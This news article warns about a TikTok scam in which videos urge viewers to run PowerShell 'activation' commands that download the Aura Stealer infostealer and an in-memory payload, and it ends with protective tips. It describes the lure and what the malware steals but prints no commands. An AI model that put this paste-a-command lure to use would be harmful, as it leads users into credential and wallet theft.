Cybercriminals are using TikTok again to ensnare unsuspecting users. This time, they’re promoting malware disguised as free activation guides for various software, including Windows, Microsoft 365, Photoshop, and even fake versions of Netflix and Spotify Premium.
Security expert Xavier Mertens uncovered this scheme, noting that similar tactics have been observed before. According to reports, these deceptive TikTok videos showcase brief PowerShell commands, alluring unsuspecting viewers to run them as administrators to “activate” or “fix” programs.
However, what these commands really do is link to a malicious site that downloads malware called Aura Stealer. This malware quietly collects saved passwords, cookies, cryptocurrency wallet information, and authentication tokens from the victim’s system.
Understanding TikTok Scams
Experts categorize this scheme as a ClickFix attack—a social engineering tactic designed to mislead victims into thinking they’re simply following legitimate tech guidance. The steps seem quick and easy, promising instant access to premium software with just one short command.
In truth, that PowerShell command leads to a remote domain that downloads harmful files through Cloudflare. The primary file involved, updater.exe, is a variant of Aura Stealer. Once it infiltrates a system, it seeks out credentials and sends them back to the perpetrator.
Another file, source.exe, employs Microsoft’s C# compiler to execute code directly in memory, complicating detection. The specific role of this second payload isn’t entirely clear, but it follows a pattern seen in previous malware aimed at stealing cryptocurrency or delivering ransomware.
Protecting Yourself from TikTok Malware
Even though these scams can be convincing, there are ways to safeguard yourself.
1) Avoid Shortcuts
Steer clear of copying or executing PowerShell commands from random TikTok videos or websites. If it offers free access to premium software, it’s likely a trap.
2) Use Trusted Sources
Always download software directly from official websites or recognized app stores.
3) Keep Security Tools Updated
Using outdated antivirus software or browsers can leave you vulnerable. Regularly update your software to stay protected.
4) Invest in Strong Antivirus Software
Choose robust antivirus tools that provide real-time scanning and protection against threats like Trojans and phishing attempts. The right software can be crucial for guarding your personal information.
5) Consider a Data Deletion Service
If your information leaks onto the dark web, a monitoring service can notify you and help remove sensitive data. While no service guarantees full data removal, they are worth considering for peace of mind, as they actively track personal information and work to erase it from multiple sites.
6) Reset Your Credentials
If you’ve followed suspicious instructions or provided credentials as a result of watching a sketchy video, reset all your passwords immediately.
7) Use Unique Passwords
It’s vital to have distinct passwords for each site. A password manager can help you create and store complex passwords, minimizing the risk of reuse.
8) Enable Multi-Factor Authentication
If offered, activate multi-factor authentication to bolster security. Even if a password is compromised, an attacker won’t gain access without further verification.
Key Takeaways
TikTok’s extensive reach makes it an attractive target for scams. What may appear to be a helpful tip can compromise your security and finances. Always be cautious, trust only verified sources, and remember—there are no shortcuts to free activation.
